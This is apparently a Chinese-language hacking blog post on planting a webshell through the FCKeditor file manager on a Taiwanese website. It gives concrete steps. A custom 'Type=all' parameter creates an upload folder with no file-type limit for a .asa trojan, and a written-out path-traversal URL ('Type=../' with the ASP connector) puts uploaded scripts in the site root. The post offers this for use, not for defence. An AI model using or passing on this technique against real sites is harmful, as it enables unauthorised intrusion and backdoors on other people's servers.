FCKeditor系統拿webshell

晚上和寶看個臺灣的站,後臺套用的是FCKeditor的系統.
這貌似是個全世界都在用的編輯系統,什麼韓國日本臺灣美國的站都在用
再***的時候,寶發現的心得我記錄下:
打開這個地址就可以上傳任何類型的文件了,我和寶上傳的是.asa的,在編輯器的目錄下正常的顯示出了馬.
但一時間找不到上傳地址,後來經過推斷,確定馬兒上傳到的位置是:
http://www.xxx.tw/UserFiles/all/1.asa
經過我們的思路整理,得出了 "Type=all" 這個變量是自己定義的,在這裏創建了all這個目錄,而且新的目錄沒有上傳文件格式的限制.
所傳的文件就到了 http://www.xxx.tw/UserFiles/cnandbao/下了
經過進一步的考慮,
如果這樣輸入:http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以傳到網站的根目錄下,這樣只要網站支持什麼腳本,你傳什麼腳本的馬就可以了.
所傳的文件就到了網站根目錄下了
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章